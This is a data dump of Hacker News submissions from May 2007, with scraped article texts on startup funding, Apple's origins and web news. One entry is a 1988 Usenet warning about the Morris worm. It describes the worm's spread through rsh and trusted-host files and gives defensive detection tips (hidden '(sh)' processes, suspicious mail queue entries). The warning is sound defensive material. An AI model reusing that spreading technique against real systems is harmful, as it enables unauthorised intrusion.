id
int64 2
42.1M
| by
large_stringlengths 2
15
⌀ | time
timestamp[us] | title
large_stringlengths 0
198
⌀ | text
large_stringlengths 0
27.4k
⌀ | url
large_stringlengths 0
6.6k
⌀ | score
int64 -1
6.02k
⌀ | descendants
int64 -1
7.29k
⌀ | kids
large list | deleted
large list | dead
bool 1
class | scraping_error
large_stringclasses 25
values | scraped_title
large_stringlengths 1
59.3k
⌀ | scraped_published_at
large_stringlengths 4
66
⌀ | scraped_byline
large_stringlengths 1
757
⌀ | scraped_body
large_stringlengths 1
50k
⌀ | scraped_at
timestamp[us] | scraped_language
large_stringclasses 58
values | split
large_stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
18,371 | gibsonf1 | 2007-05-01T12:53:18 | Wikipedia co-founder wants open-source search engine | null | http://news.com.com/Wikipedia+co-founder+wants+open-source+search+engine/2100-1032_3-6180379.html?tag=nefd.top | 4 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,374 | gibsonf1 | 2007-05-01T12:55:36 | Comcast and Yahoo ink Internet advertising deal | null | http://news.com.com/Comcast+and+Yahoo+ink+Internet+advertising+deal/2100-1024_3-6180385.html?tag=nefd.top | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,375 | gibsonf1 | 2007-05-01T12:56:23 | Revamped Google tools let you be you | null | http://news.com.com/Revamped+Google+tools+let+you+be+you/2100-1038_3-6180365.html?tag=nefd.top | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,376 | Sam_Odio | 2007-05-01T12:56:27 | iMac, iPod, iPhone... iGoogle?? | null | http://venturebeat.com/2007/05/01/google-gets-personal-with-igoogle/ | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,378 | gibsonf1 | 2007-05-01T12:57:45 | Microsoft takes Silverlight beyond Windows | null | http://news.com.com/Microsoft+takes+Silverlight+beyond+Windows/2100-1012_3-6180322.html?tag=nefd.top | 4 | 2 | [
18425,
18473
] | null | null | null | null | null | null | null | null | null | train |
18,380 | gibsonf1 | 2007-05-01T12:59:46 | The Travails of Tracking Web Traffic | null | http://businessweek.com/technology/content/apr2007/tc20070430_491005.htm?chan=top+news_top+news+index_technology | 2 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,384 | veritas | 2007-05-01T13:28:43 | 10 Golden Lessons From Steve Jobs | null | http://ririanproject.com/2007/04/20/10-golden-lessons-from-steve-jobs/ | 12 | 1 | [
19296
] | null | null | null | null | null | null | null | null | null | train |
18,385 | unfoldedorigami | 2007-05-01T13:31:04 | Should you raise debt or equity? | null | http://www.venturehacks.com/articles/debt-or-equity | 11 | 5 | [
18475,
18476
] | null | null | no_error | Should I raise debt or equity? | 2007-05-01T09:16:05+00:00 | Nivi |
·
May 1st, 2007
Summary: If you raise convertible debt for a seed round, you should negotiate simple and short documents, close quickly and cheaply, and maintain your options for the Series A. But first, determine if you should raise debt or equity—debt is better for small financings with small discounts.
Startups often raise their seed round by selling convertible debt instead of equity because debt is simpler and cheaper. Read Yokum Taku’s excellent series on convertible debt for a primer.
Seed stage convertible debt agreements are fairly simple, especially if your investors are angels. There isn’t a lot to hack in these agreements. You should be more careful if your debt investors are VCs, but these debt financings are still much easier to negotiate than an equity financing.
Later stage convertible debt can get complicated and adversarial. We know companies that took convertible debt from a corporate investor and couldn’t pay the debt back on time—which triggered the corporate investor’s right to take over the company. Fun stuff.
If you are raising convertible debt, you should focus on negotiating simple and short documents, closing quickly and cheaply, and maintaining your options for the Series A. But first…
Determine whether you should sell debt or equity.
Let’s say your seed investors purchase debt with a 20% discount off the Series A share price. If you eventually sell shares in the Series A for $1 each, the seed investors will convert their debt to equity for $0.80/share.
Now, let’s say your seed investors are willing to buy equity for $0.90/share instead of buying debt. Should you sell debt or equity?
You should sell debt only if you can use the money to increase today’s share price by over 25% before the Series A financing. Otherwise, sell equity.
In this example, debt is worthwhile if you think you can sell Series A shares for over $0.90/share × 125% = $1.125/share.
Let’s say you decide to sell debt in your seed round and you raise a Series A at $2/share. After applying a 20% discount, your debt investors pay $1.60/share for their Series A shares. You were wise to sell debt to your seed investors in the seed round instead of selling them equity for $0.90/share.
But if you raise a Series A at $1/share, your debt investors pay $0.80/share for their Series A shares. You should have taken their offer to buy equity at $0.90/share in the seed round.
In general, you should sell debt only if you think it will increase your share price over
today’s market price for your shares ÷ (1 – discount).
Selling debt is usually better than selling equity in a typical seed round.
If you are raising a typical seed round, say $50K-$500K, you probably want to sell debt instead of equity. If you raise enough seed debt to last 6-12 months, you should have enough time to increase your valuation by the 25%-100% required to overcome typical discounts of 20%-50%.
For example, if you raise $250K in a seed round in return for 15% of your equity, your seed round pre-money valuation will be $1.42M. You should raise debt instead if you expect your Series A pre-money valuation to be at least
$1.42M ÷ (1 – .2) = $1.77M (in the case of a 20% discount)
or
$1.42M ÷ (1 – .5) = $2.83M (in the case of a 50% discount).
In general, if you don’t think you can increase your share price and valuation by 2 to 3 times in every round of financing from Series A to Series C, you should probably pack up and go home. In fact, the company’s share price typically increases the most from the seed round to the Series A as the business goes from nothingness to product, users, or revenue.
Selling lots of debt may be worse than selling equity.
If you are raising a large seed round, say $1M, you may want to sell equity instead of debt.
For example, if you raise $1M in a seed round in return for 15% of your equity, your seed round pre-money valuation will be $5.67M. But if you raise $1M in return for debt at a 25% discount, your Series A pre-money will have to be at least
$5.67M ÷ (1 – .25) = $7.56M
for the debt to be worthwhile. $1M of seed financing may not take your Series A valuation above $7.56M—you may want to sell equity instead of debt in the seed round.
How have you decided to raise debt or equity?
Submit your thoughts and questions on raising convertible debt in the comments. We’ll discuss the most interesting ones in a future article.
| 2024-11-08T10:50:23 | en | train |
18,392 | veritas | 2007-05-01T14:06:46 | Tech.view | Criminalising the consumer | Economist.com | null | http://www.economist.com/daily/columns/techview/displaystory.cfm?story_id=9096421 | 4 | 0 | null | null | null | missing_parsing | Criminalising the consumer | 2007-04-27T00:00:00.000Z | The Economist | Apr 27th 2007|
IS IT legal to make a copy of that DVD you've just bought so the family can watch it around the home or in the car? In one of the most watched copyright cases in recent years, a judge in northern California ruled last month that copying DVDs for personal use was legal, given the terms of the industry's licence and the way the copies were made.Reuse this content | 2024-11-07T08:50:48 | null | train |
18,394 | dawie | 2007-05-01T14:13:24 | Dead Man Dancing | null | http://www.foundread.com/view/dead-man-dancing | 8 | 2 | [
18395
] | null | null | no_article | null | null | null | null | 2024-11-08T09:31:42 | null | train |
18,397 | Sam_Odio | 2007-05-01T14:43:01 | "Year Zero" project - the way a viral campaign should be run | null | http://www.37signals.com/svn/posts/403-year-zero-project-the-way-a-viral-campaign-should-be-run | 14 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,398 | msgbeepa | 2007-05-01T14:47:58 | Microsoft Launches Silverlight - Adobe Flash Killer | null | http://www.media-sight.net/2007/05/microsoft-launches-silverlight-flash.html | 1 | -1 | null | null | true | null | null | null | null | null | null | null | train |
18,399 | dawie | 2007-05-01T14:48:04 | CSS Float Theory: Things You Should Know | Smashing Magazine | null | http://www.smashingmagazine.com/2007/05/01/css-float-theory-things-you-should-know/ | 6 | 3 | [
18464,
18650
] | null | null | null | null | null | null | null | null | null | train |
18,401 | Sam_Odio | 2007-05-01T14:50:59 | IBM struggles to stay relevant w/ press, fails miserably | null | http://www.theregister.co.uk/2007/05/01/second_life_campaign/ | 4 | 1 | [
18467
] | null | null | null | null | null | null | null | null | null | train |
18,411 | dawie | 2007-05-01T15:22:34 | How to Create Passionate Customers | null | http://www.pronetadvertising.com/articles/how-to-create-passionate-customers5329.html | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,412 | mattjaynes | 2007-05-01T15:24:29 | Google Fails To Blink | null | http://www.techcrunch.com/2007/05/01/google-fails-to-blink/ | 13 | 11 | [
18428,
18442,
18443,
18439,
18526
] | null | null | cut_off | Google Fails To Blink | TechCrunch | 2007-05-01T11:20:17+00:00 | Michael Arrington |
4:20 AM PDT · May 1, 2007
Google responded to Viacom’s $1 billion lawsuit over alleged YouTube copyright infringement today. Their answer: Let’s fight this out, in front of a jury.
We earlier predicted that there was no way Google would agree to a settlement with Viacom that involved any damages, and assumed that they would work to sign a licensing deal instead and convince Viacom to simply settle the lawsuit. Viacom later signaled that they weren’t much interested in a deal when they agreed to provide content to Joost and then did a search advertising deal with Yahoo instead of Google.
I have visions of bloggers fighting to get a good seat at the trial, and live blogging the entire thing. The fate of YouTube’s buisness model, as well as many other web startups, will likely be linked to the outcome of this litigation.
Most Popular
Michael Arrington most recently Co-Founded CrunchFund after leading TechCrunch to a successful exit with AOL. His venture investments include Uber, Airbnb and Pinterest. Michael was the Editor of TechCrunch, which he founded in 2005. In 2008 Time Magazine named Michael “One of the World’s 100 most influential people”. Michael also practiced securities law at O’Melveny & Myers and Wilson Sonsini Goodrich & Rosati.Michael graduated from Stanford Law School and
Claremont McKenna College.
View Bio
Newsletters
Subscribe for the industry’s biggest tech news
Related
Latest in TC
| 2024-11-08T17:20:25 | en | train |
18,415 | moses120042 | 2007-05-01T15:39:34 | Jabber founder Jeremie Miller joins Wikia for search product | null | http://www.centernetworks.com/jabber-founder-joines-wikia-for-wikia-search | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,418 | usablecontent | 2007-05-01T15:43:46 | Yahoo Signs Online Advertisement Deal With Comcast, Google Dumped Yet Again | null | http://startupmeme.com/2007/05/01/yahoo-signs-online-advertisement-deal-with-comcast/ | 4 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,422 | jkush | 2007-05-01T16:05:10 | Document Arc Diagrams: Illustrates connected segments of a document that share a similar vocabulary | null | http://www.neoformix.com/Projects/DocumentArcDiagrams/index.html | 6 | 2 | [
18440,
18445
] | null | null | null | null | null | null | null | null | null | train |
18,427 | usablecontent | 2007-05-01T16:13:24 | Microsoft Joins The Party, Buying Internet Advertisement Firm 24/7 Real Media for $1 billion | null | http://startupmeme.com/2007/05/01/microsoft-joins-the-party-buying-internet-advertisement-firm-247-real-media-for-1-billion/ | 1 | 4 | [
18434
] | null | null | null | null | null | null | null | null | null | train |
18,435 | transburgh | 2007-05-01T16:46:15 | Go BIG Interviews Guy Kawasaki: Avoiding Common Pitch Mistakes | null | http://www.gobignetwork.com/wil/2007/5/1/go-big-interviews-guy-kawasaki-avoiding-common-pitch-mistakes/10143/view.aspx | 2 | 0 | null | null | null | fetch failed | null | null | null | null | 2024-11-08T13:06:41 | null | train |
18,437 | whacked_new | 2007-05-01T16:47:43 | Here is a Basic Private Messaging Tool for news.yc Users | null | http://news.ycombinator.withmsg.com/ | 14 | 6 | [
18438,
18462
] | null | null | null | null | null | null | null | null | null | train |
18,441 | jcwentz | 2007-05-01T16:59:44 | Condemned To Google Hell | null | http://www.forbes.com/home/technology/2007/04/29/sanar-google-skyfacet-tech-cx_ag_0430googhell.html | 6 | 4 | [
18516,
18508,
18478,
18454
] | null | null | http_404 | 404 | null | ByJohn HyattForbes Staff | Daily Cover StoryHandicapping Trump’s Brain Trust: The New TrumpiverseByJohn HyattForbes StaffThe president-elect has long treasured close alliances with the rich and famous but this time around, he has a new group of fresh-faced loyalists. AI Startups, Investors Eagerly Await Less ‘Red Tape’ Under TrumpLeading AI startup founders and venture capitalists hope that a new Trump presidency will spur more acquisitions amid a laxer but not nonexistent regulatory environment.QUOTE OF THE DAY“Nowadays you’re only limited by your dreams. We think big and we dream big.”Huda Kattan, Founder of Huda Beauty | 2024-11-08T17:50:30 | null | train |
18,452 | nostrademons | 2007-05-01T17:41:55 | Homebrew and How the Apple Came to Be | null | http://www.atariarchives.org/deli/homebrew_and_how_the_apple.php | 2 | 0 | null | null | null | missing_parsing | Homebrew And How The Apple Came To Be | null | null |
HOMEBREW AND
HOW THE APPLE
CAME TO BE
by Stephen Wozniak
Stephen Wozniak is the designer of
the Apple II computer and cofounder of Apple Computer Inc.Without computer
clubs there would probably be no Apple computers. Our club in the
Silicon Valley, the Homebrew Computer Club, was among the first of its
kind. It was in early 1975, and a lot of tech-type people would gather
and trade integrated circuits back and forth. You could have called it
Chips and Dips. We had similar interests and we were there to help
other people, but we weren't official and we weren't formal. Our
leader, Lee Felsenstein, who later designed the Osborne computer, would
get up at every meeting and announce the convening of "the Homebrew
Computer Club which does not exist" and everyone would applaud happily.
The theme of the club was "Give to help others."
Each session began with a "mapping period," when people would get up
one by one and speak about some item of interest, a rumor, and have a
discussion. Somebody would say, "I've got a new part," or somebody else
would say he had some new data or ask if anybody had a certain kind of
teletype.
During the "random access period" that followed, you
would wander outside and find people trading devices or information and
helping each other. Occasionally one guy would show up and say, "Is
there anyone here from Intel? No? Well, I've got some Intel chips we
want to raffle off." This was before big personal computer firms and
big money considerations. There was just one personal computer then,
the Altair 8800, based around the Intel 8080 microprocessor.
The Apple I and II were designed strictly on a
hobby, for-fun basis, not to be a product for a company. They were
meant to bring down to the club and put on the table during the random
access period and demonstrate: Look at this, it uses very few chips.
It's got a video screen. You can type stuff on it. Personal computer
keyboards and video screens were not well established then. There was a
lot of showing off to other members of the club. Schematics of the
Apple I were passed around freely, and I'd even go over to people's
houses and help them build their own.
The Apple I and Apple II computers were shown off
every two weeks at the club meeting. "Here's the latest little
feature," we'd say. We'd get some positive feedback going and turn
people on. It's very motivating for a creator to be able to show what's
being created as it goes on. It's unusual for one of the most
successful products of all time, like the Apple II, to be demonstrated
throughout its development.
Today it's pretty obvious that if you're going to
build a billion-dollar product, you have to keep it secret while it's
in development because a million people will try to steal it. If we'd
been intent on starting a company and selling our product, we'd
probably have sat down and said, "Well, we have to choose the right
microprocessor, the right number of characters on the screen," etc. All
these decisions were being made by other companies, and our computer
would have wound up being like theirs-a big square box with switches
and lights, no video terminal built in . . .
We had to be more pragmatic. The 6502
microprocessor, for instance, was chosen for one reason only. It was
the first one to sell over the counter for $20. The 8080 cost $370 at
the time, and you couldn't get it at any surplus stores. You had to go
down to a distributor, and they made you feel like you had to be a
company with an account. It wasn't set up for hobbyists or
experimenters.Apple Seedlings
Steve Jobs was a friend of mine from high school. We were introduced
because we had two things in common: electronics and pranks. It turned
out that he had a tremendous drive to start a company. He had worked at
Atari and had become friends with some of the key people there,
including Nolan Bushnell, the founder. Nolan was his idol. Steve wanted
to have a successful product, go out and start selling it, and make
some money. He also had excellent product ideas for the upcoming home
personal computer.
To produce the Apple I, Steve and I formed a
partnership. We didn't sell very many Apple Is the first year. We built
them at night in our garage. At first we expected to sell circuit
boards at the Homebrew Club: just put in your own chips and it'll work.
Then we got a $50,000 order from a local store and we were in heaven.
The trouble was how to get the money to build a
hundred computers-they might cost over a hundred dollars each to build.
Steve went to a local parts supplier and talked them into giving us a
lot of parts on thirty days' net credit. It was very unusual for them
to give us credit, because we didn't own anything. We didn't own
houses. We didn't even own our cars. But Steve is very persuasive. We'd
get the parts and then stuff them into the circuit boards, have them
soldered, get them back in the garage and test them. And we could turn
the whole cycle around in ten days and get paid. It worked really great
because we had only one level of management.
We got our names established. The computer magazines
started carrying lists of all the microcomputers coming out, and they'd
describe all the characteristics-how much memory, which processor, was
it assembled or was it a kit, what was its price. The Apple I had a
good appearance, and we were always at the top of the lists because
they were in alphabetical order.
After the Apple I was out, we tried to add new
features. We thought about color and maybe some high-resolution
graphics. I found ways to optimize and combine different parts of the
circuits and make things with fewer chips. It's great to show off at a
club that you use fewer chips than someone else. I did it for no other
reason.
The Apple II came out of trying to improve the Apple
I. From thinking out a way to make it with half as many chips, you
could have a much better product. It was faster, it had color, it had
high-resolution graphics, it had mixed modes on the screen with text. A
lot of neat features made it look like this might be a nifty product.
It turns out that some of its best features were inspired by what
little experience we had.
Steve and I had done a game for Atari-Breakout for
the arcades-before games were on microprocessors. We were running the
Apple II down at the Homebrew Club, so I thought it would be neat if
you could write Breakout in BASIC. I added graphics mode commands to
the Integer BASIC I was writing. Breakout needs paddles: I had to add a
little circuitry for paddle and push button. You need sound: when the
ball hits the bricks, ping; when you lose, ehhhh. So I put a speaker
in. All of these features were basically just to play one game.
These turned out to be common features for the
personal computers that have come out since that time. We weren't quite
the first to offer a keyboard and video output, but we were close. We
were the first to offer built-in BASIC. We made the first built-in
cassette port so you could use a cheap cassette recorder to load your
programs in and store them. We had started to set standards for what
have come to be known as low-cost personal computers.
Just about the only argument on product design Steve
and I ever had was on the number of expansion slots. I wanted eight and
he wanted two. I was for eight simply because I'd been around
minicomputers that had a lot of extra function boards plugged in. Steve
figured people would only use maybe a printer and a modem, and that was
it. Fortunately we went with eight, because the Apple II's
expandability was important to its success.
When we geared up to manufacture the Apple II, it
looked like I'd have to leave my nice secure job at Hewlett-Packard. I
thought about it and said no. I just loved going down to the Homebrew
Computer Club, showing off my ideas and designing neat computers. I was
willing to do that for free for the rest of my life. Steve got
extremely anxious. He got all my friends and relatives to start phoning
and tell me why I was making a mistake. Finally one of them called and
said you can start a company, remain an engineer and also get rich. I
decided that you can start a company and make money. Once I got the
consciousness right, it was easy to quit HP and take this big risk.
We got our first ad agency and began discussing who
we were and what our product was and how we would market it. Of course,
to a marketer Apple was an odd name. It came from the days when you
picked an interesting, fun name for a company. You do that when you're
on a hobby basis. The ad agency kept telling us the name had to be
changed. We had to have a name that suggested technology, number
crunching, calculations, data bases. We took the attitude that Apple is
a good name. Our computer would be friendly-everything an apple
represents, healthy, personal, in the home. We had to hold our ground
on that one. The agency designed our color logo. (Our original logo was
Newton under the apple tree.) Steve twiddled the colors around and kept
a rainbow orientation.COMPUTER GROUP GUIDE
One of the most
complete listings of user groups can be found in the annual Classroom
Computer News Directory. Originally intended for teachers, this
200-page
directory provides a wealth of information for general users on all
aspects of computing, including sets of guidelines for hardware and
software selection as well as a complete Yellow Pages of computer
services and products.
The directory is available from Classroom Computer
News, 341 Mt. Auburn St., Watertown, MA 02172. Telephone: (617)
923-8595.
Core Memory
We introduced the Apple II at the First West Coast Computer Faire. The
first computer shows were informal, not like the professionally
oriented shows we have today. They were more an outgrowth of computer
clubs. We got a lot of our initial support from these clubs. I started
speaking at them whenever I was invited, and I've been doing it from
that day on. I travel at my own expense because I think it's exciting
to tell the story of how our company sprang up from a club.
Our success was due to a number of factors. First of
all, we had never manufactured computers before. We couldn't look back
and say, "Here's how computers earned a lot of money in the sixties and
seventies, that's the style to do." All we thought about was what was
going to work out great in our own homes. Our motivation was what would
be good in the end. If there was a known formula for what would make a
successful product, and what would make a billion dollars, all the big
companies would have jumped on it. All these companies were a lot
smarter than us. What we had was luck. We did the right things with the
right coincidences of timing and the right people in the right place.
We had a lot of interest and enthusiasm. The rewards
that drove us were all intrinsic. The computers were being put together
to show off at a computer club: "Look at this. I put in these neat
commands." It's not like you get a better salary, or a better title, or
more respect at work, or a new car. We had the autonomy of creators. We
could decide what was going to make a neat computer. We could implement
it, and we could show it off. We also had excellent feedback from our
peers.
Back then, the small computer scene was based on the
belief that we were all on top of a revolution. Everyone attending the
club in 1975-76 knew there was a big computer revolution occurring and
the rest of the world wasn't aware of it yet. That's why there was so
much excitement and spirit. We were finally going to get control of our
own computers. It wasn't a million-dollar thing that belonged to the
company you worked for. This big thing that had so much value, and that
we wanted to use and control, we finally were getting close to. Look at
how many companies have sprung out of our Homebrew Computer Club. At
last count, it was something like twenty-one! We managed to bring the
computer revolution home.
I might get
electrocuted. This particular anxiety was a favorite among
our forefathers, who trotted it out when they were confronted by
inventions like the light bulb and telephone. Rest assured: the
computer keyboard's electrical current, about equal to that of a
cordless electric shaver, is just too low to cause harm.
I'll never
understand how to operate a computer. Nowadays, turning on the
machine
usually involves no more than flipping a switch and loading in a
program. And in place of those undecipherable symbols that trigger
long-forgotten fears of fractions, most programs now use English as the
means of communication. Many of them also have pick-and-choose menu
formats to guide you through available choices.
I might break it.
You can't get that rough with a computer simply by
typing on it and turning it on or off. Home computers are akin to any
store-bought item: they vary in durability according to manufacturer,
model, and wear and tear, and they have to be treated with a bit of
respect. I have no sympathy for the user who douses his machine with
coffee and complains when it prints out Martian dialect.
The machine might
lose my work. Wiping out a sentence or two is always
a possibility, as is destroying everything you've entered over the last
five years. But you can guard against such losses by watching your
delete commands and taking proper care of your floppy disks. Most
important is that well-known data processing axiom: "Back it up." It
takes no time at all to copy a program or data from one disk to
another, thus assuring yourself of the ability to restore any work that
gets lost along the way.
I might lose the
privacy of my data. If you have the traditional
stand-alone system, with no outside machines attached, your data is as
safe as it would be on a piece of paper. For added security, don't let
anyone read over your shoulder when you enter your data or password and
remove the disk when your session is finished. If your computer is
hooked up via modem and telephone line to a friend's machine, and if
you happen to be paranoid about wiretapping, you can invest in
encryption hardware or software to encode and decode your
communications. As for the suspicion that someone will phone your
computer and search through your disk-based data while you sleep, just
keep the power turned off; no one
has yet found a way to turn on a computer by remote control.
Computers have more
capability than I need. This is also true of
pencils, but how many people worry about not using them to draw works
of art or create literary masterpieces? Personal computers range from
relatively inexpensive units to quite elaborate affairs and offer a
wide array of functions. Chances are, as you and your computer get used
to each other, you'll expand your horizons and purchase software
packages that increase your machine's versatility.
Using a computer
will lower my status. This illusion circulates among
office personnel who are actually afraid of looking silly as they try
to master the new technology. If computers are that alien to you,
especially if you're older or set in your ways, a gradual introduction
is probably best. Sympathetic private tutoring can prevent loss of face
before co-workers and convince you that business computers may enhance
your status.
I might lose the
ability to do things on my own. A computer is not an
electrode-studded brain sapper, nor is it a device that turns users
into Einsteins. As a tool, the computer simply helps you accomplish
your work with maximum efficiency and expands rather than hinders your
own capabilities. Erasing typewriter errors by hand, for example,
impedes the creative act of writing, whereas correcting text on a
personal computer is a pleasure. As for mathematics, is it more
productive to hunt for a multiplication error or to be freed to explore
new formulas?
A computer is
mathematical and not for creative types. This view is
held by artistes, literary denizens, and just plain folks with a morbid
fear of numbers. The good news about computers is that if you don't
want to play with accounting or physics, you can buy a word processing
program to help with your writing, a music package to aid in composing,
or a knee-slapping outer-space game to match your wits against.
GEORGE S. ZARR, JR., Renaissance man and computer professional
Return to Table of Contents
| Previous Article
| Next Article
| 2024-11-08T17:17:23 | null | train |
18,453 | codeLove | 2007-05-01T17:45:04 | The Pita Principle for startups| Nirvana through bootstrapping [Aug 2001] | null | http://www.inc.com/magazine/20010801/23220.html | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,458 | usablecontent | 2007-05-01T18:20:11 | Ad Exchange Gold Rush Continues, ContextWeb Also Launches an Ad Exchange called "ADSDAQ" | null | http://startupmeme.com/2007/05/01/contextweb-also-launches-an-ad-exchange-adsdaq/ | 4 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,460 | far33d | 2007-05-01T18:22:59 | Murdoch going after the WSJ | null | http://online.wsj.com/article/SB117803255991188252.html?mod=blogs | 7 | 1 | [
18491,
18527
] | null | null | null | null | null | null | null | null | null | train |
18,468 | Tichy | 2007-05-01T18:58:44 | Are there good solutions for age verification? | null | 4 | 8 | [
18469,
18486,
18551,
18471,
18553
] | null | null | invalid_url | null | null | null | null | 2024-11-08T16:37:59 | null | train |
|
18,490 | jslogan | 2007-05-01T20:27:46 | Do you really value your customers or do you just want their money? | null | http://www.jslogan.com/content/view/165/ | 3 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,492 | bootload | 2007-05-01T20:43:46 | Living online, with web apps | null | http://fortuito.us/2007/04/living_online_with_web_apps | 5 | 3 | [
18496,
18515
] | null | null | null | null | null | null | null | null | null | train |
18,493 | unfoldedorigami | 2007-05-01T20:52:50 | Amazon S3: New pricing model | null | http://blogs.smugmug.com/don/2007/05/01/amazon-s3-new-pricing-model/ | 13 | 3 | [
18572,
18500
] | null | null | null | null | null | null | null | null | null | train |
18,497 | usablecontent | 2007-05-01T21:41:13 | Sonopia Raises $12.7 Million in Series B Funding for Mobile "Social" Network | null | http://startupmeme.com/2007/05/01/sonopia-raises-127-million-in-series-b-funding/ | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,503 | bootload | 2007-05-01T21:59:39 | stuckunstuck (twitter as gateway) | null | http://stuckunstuck.com/statuses/list | 1 | 2 | [
18506,
18537
] | null | null | fetch failed | null | null | null | null | 2024-11-08T00:25:56 | null | train |
18,511 | yaacovtp | 2007-05-01T22:33:36 | Yahoo finally gets a 10 pagerank | null | 1 | 1 | [
18512
] | null | null | invalid_url | null | null | null | null | 2024-11-08T16:37:59 | null | train |
|
18,521 | brett | 2007-05-01T23:42:00 | Memory leak patterns in JavaScript | null | http://www-128.ibm.com/developerworks/web/library/wa-memleak/ | 6 | 2 | [
18692,
18646
] | null | null | null | null | null | null | null | null | null | train |
18,523 | brett | 2007-05-02T00:00:02 | Ask The VC - Supreme Court Issues Two Important Patent Decisions | null | http://www.askthevc.com/2007/05/supreme_court_issues_two_impor.php | 3 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,530 | smg | 2007-05-02T00:21:17 | Microsoft Memories on Fractals of Change | null | http://blog.tomevslin.com/2007/05/microsoft_memor.html | 2 | 0 | null | null | null | no_article | null | null | null | null | 2024-11-08T08:38:36 | null | train |
18,532 | andres | 2007-05-02T00:29:01 | Dell Picks Ubuntu Linux | null | http://www.redherring.com/Article.aspx?a=22152&hed=Dell+Picks+Ubuntu+Linux | 9 | 3 | [
18755,
18576
] | null | null | null | null | null | null | null | null | null | train |
18,533 | Sam_Odio | 2007-05-02T00:31:46 | Joost no longer in private beta | null | http://gigaom.com/2007/05/01/joost-almost-launches/ | 6 | 2 | [
18673,
18619
] | null | null | null | null | null | null | null | null | null | train |
18,539 | rwalker | 2007-05-02T01:15:48 | Digg fights user revolt over HD-DVD ban -- Digg founders took HD-DVD sponsorship | null | http://texyt.com/Digg+founders+took+HD-DVD+sponsorship+00071 | 6 | 5 | [
18597,
18592,
18547,
18577,
18589
] | null | null | null | null | null | null | null | null | null | train |
18,545 | brlewis | 2007-05-02T01:33:02 | iminlikewithyou invite in exchange for site feedback | null | 4 | 19 | [
18546,
18562,
18604,
18560
] | null | null | invalid_url | null | null | null | null | 2024-11-08T16:37:59 | null | train |
|
18,563 | andres | 2007-05-02T02:57:29 | Digg the Blog: What's Happening with HD-DVD Stories? | null | http://blog.digg.com/?p=73 | 1 | 0 | null | null | null | no_title | null | null | null | null | 2024-11-08T20:51:56 | null | train |
18,569 | mtarifi | 2007-05-02T03:04:47 | Starting a company is like going to war [1998] | null | http://members.forbes.com/global/1998/1102/0116070a.html | 3 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,574 | dawie | 2007-05-02T03:11:35 | Can I please have a iminlikewithyou invite? | null | 2 | 6 | [
18607,
18575
] | null | null | invalid_url | null | null | null | null | 2024-11-08T16:37:59 | null | train |
|
18,581 | mtarifi | 2007-05-02T03:23:04 | Duke MBAs Fail Ethics Test | null | http://www.businessweek.com/bschools/content/apr2007/bs20070430_110466.htm?chan=top+news_top+news+index_businessweek+exclusives | 1 | 1 | [
18582
] | null | null | null | null | null | null | null | null | null | train |
18,583 | dawie | 2007-05-02T03:25:39 | Cool Concept: BarCardz Is the Cyber Calling Card | null | http://mashable.com/2007/05/01/barcardz/ | 4 | 4 | [
18591
] | null | null | no_error | BarCardz Is the Cyber Calling Card | 2007-05-02T00:30:30+00:00 | null |
Credit:
BarCardz is a new social network aimed at putting a stop to cyber-stalkers.In essence, they've created a supremely elite way of creating your personal profile and building up your network. It starts with your BarCard. You can customize and print them (or have them shipped to you), and they operate like a business card, displaying some basic information and a way to get in touch with you through the BarCardz network. The only way to add friends is by getting a BarCard from them, or by handing one out. The receiver of course, has to join BarCardz and add you as a friend that way. There are games to play with other friends, and a Play Book giving hints and tips on how to maneuver through several social situations and how to spread your BarCard.BarCardz is a heavily closed community. They don't even have a search tab, so you can't find existing members on the site. This can be a good or bad thing, depending on what you'd like to use your social network for. In many ways this mimics (in reverse) the text messaging systems that are popular in the UK, masking your personal phone number but granting an opportunity to find and chat with others you're interested in for the purpose of eventually meeting them in person. All of your personal information is displayed on your BarCardz profile, so be sure to give your cards out to people you are truly interested in. BarCardz may be looking to curb cyber-stalkers, so hopefully they haven't created so many steps to finding friends that they've scared off everyone else in the process.
| 2024-11-08T14:28:21 | en | train |
18,590 | nickb | 2007-05-02T04:18:28 | Digg shuts down user submissions after every story on the front page is the HD-DVD key | null | http://www.techpwn.com/?p=422 | 20 | 25 | [
18609,
18832,
18616,
18623,
18627,
18606,
18594,
18613
] | null | null | null | null | null | null | null | null | null | train |
18,596 | staunch | 2007-05-02T04:44:16 | Crackbook Is Causing The Rapid Decline of the Dating Industry | null | http://plentyoffish.wordpress.com/2007/05/01/rapid-decline-of-the-dating-industry/ | 8 | 3 | [
18661,
18794
] | null | null | null | null | null | null | null | null | null | train |
18,601 | staunch | 2007-05-02T04:54:57 | 1988 Usenet Post About How the Internet ("Morris") Worm Worked | null | http://groups.google.com/group/news.sysadmin/browse_frm/thread/3bc71638708323b4/9c5e0b0eec39f696#9c5e0b0eec39f696 | 6 | 2 | [
18845
] | null | null | Failed after 3 attempts. Last error: Quota exceeded for quota metric 'Generate Content API requests per minute' and limit 'GenerateContent request limit per minute for a region' of service 'generativelanguage.googleapis.com' for consumer 'project_number:854396441450'. | The virus | null | null | News Knowerunread,Nov 3, 1988, 11:58:27 AM11/3/88to The patch from Keith Bostic in the last message is *not* sufficient tohalt the spread of the virus. We have discovered from looking at thebinaries that the virus also attempts to spread itself via "rsh"commands to other machines. It looks through a *lot* of files to findpossible vectors to spread.If you have a bunch of machines with hosts.equiv set or .rhosts files,you should shut them *all* down at the same time after you have fixedsendmail to prevent a further infestation. If you don't clear outthe versions in memory, you won't protect your other machines.The virus runs itself with the name "sh" and then overwrites argv,so if a "ps ax" shows any processes named "(sh)" without a controllingtty, you have a problem. Due to the use of other uids from rsh,don't make any conclusions if the uid is one of your normal users.Also, check your mailq (do a mailq command). If you see any entriesthat pipe themselves through sed and sh, delete them from the queuebefore you restart your 